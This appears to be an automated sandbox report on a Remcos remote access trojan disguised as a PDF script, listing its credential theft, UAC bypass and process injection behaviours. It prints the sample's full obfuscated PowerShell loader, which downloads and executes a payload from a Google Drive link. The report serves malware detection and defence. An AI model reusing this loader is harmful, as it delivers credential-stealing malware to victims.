Malware Analysis Report

2024-12-01 03:11

Sample ID 241111-va4t4svnaq
Target 11315781264�pdf.zip
SHA256 794df456648b056ba688154bd73bbff754c8a7932a9d9dd5b27f4ad6986c60cf
Tags
discovery remcos remotehost collection credential_access evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

794df456648b056ba688154bd73bbff754c8a7932a9d9dd5b27f4ad6986c60cf

Threat Level: Known bad

The file 11315781264�pdf.zip was found to be: Known bad.

Malicious Activity Summary

discovery remcos remotehost collection credential_access evasion rat stealer trojan

UAC bypass

Remcos

Remcos family

Detected Nirsoft tools

NirSoft MailPassView

NirSoft WebBrowserPassView

Blocklisted process makes network request

Uses browser remote debugging

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook accounts

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Modifies registry class

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 16:48

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 16:48

Reported

2024-11-11 16:50

Platform

win7-20240903-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\Cab1F74.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/1904-20-0x000007FEF5A8E000-0x000007FEF5A8F000-memory.dmp

memory/1904-21-0x000000001B500000-0x000000001B7E2000-memory.dmp

memory/1904-23-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

memory/1904-22-0x0000000002790000-0x0000000002798000-memory.dmp

memory/1904-25-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

memory/1904-24-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

memory/1904-26-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

memory/1904-27-0x000007FEF5A8E000-0x000007FEF5A8F000-memory.dmp

memory/1904-28-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

memory/1904-29-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

memory/1904-30-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

memory/1904-31-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 16:48

Reported

2024-11-11 16:50

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2608 set thread context of 3664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 set thread context of 3364 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 set thread context of 1876 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1716 wrote to memory of 3308 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1716 wrote to memory of 3308 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1980 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1980 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1980 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 8 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 8 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 8 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 8 wrote to memory of 740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 8 wrote to memory of 740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 4468 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2608 wrote to memory of 4468 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1912 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1912 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2608 wrote to memory of 3664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 3664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 3664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 3664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 3364 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 3364 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 3364 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 3364 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 1876 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 1876 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 1876 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 1876 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
